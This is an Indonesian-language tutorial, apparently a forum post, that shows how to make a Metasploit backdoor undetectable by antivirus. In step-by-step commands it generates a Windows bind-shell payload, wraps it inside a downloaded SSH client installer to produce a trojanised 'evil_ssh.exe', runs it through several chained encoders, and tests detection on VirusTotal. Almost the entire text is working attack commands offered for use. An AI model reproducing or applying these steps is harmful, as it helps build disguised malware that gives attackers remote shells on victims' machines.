[giecl9$]

Oke kali ini saya akan jelaskan bagaimana membypass backdoor dari semua antivirus.

Tujuan :
Antivirus melindungi mesin dari malware tetapi tidak semuanya dengan cara untuk mengemas malware untuk membuat lebih sulit untuk dideteksi, dengan menggunakan metasploit untuk membuat malware sama sekali tak terlihat untuk antivirus.

Jalankan service postgresql dan metasploit

Code:

service postgresql start
service metasploit start

Creating Listener

Code:

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

Di folder /root akan tersimpan listen.exe

Encoding Listener

Code:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

Di folder /root akan tersimpan evil_ssh.exe

Code:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

Di folder /root akan tersimpan listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe

Setelah itu scan backdoor yang sudah kita buat di :
https://www.virustotal.com

Hasilnya :




Terima Kasih.
Maaf kalo repost.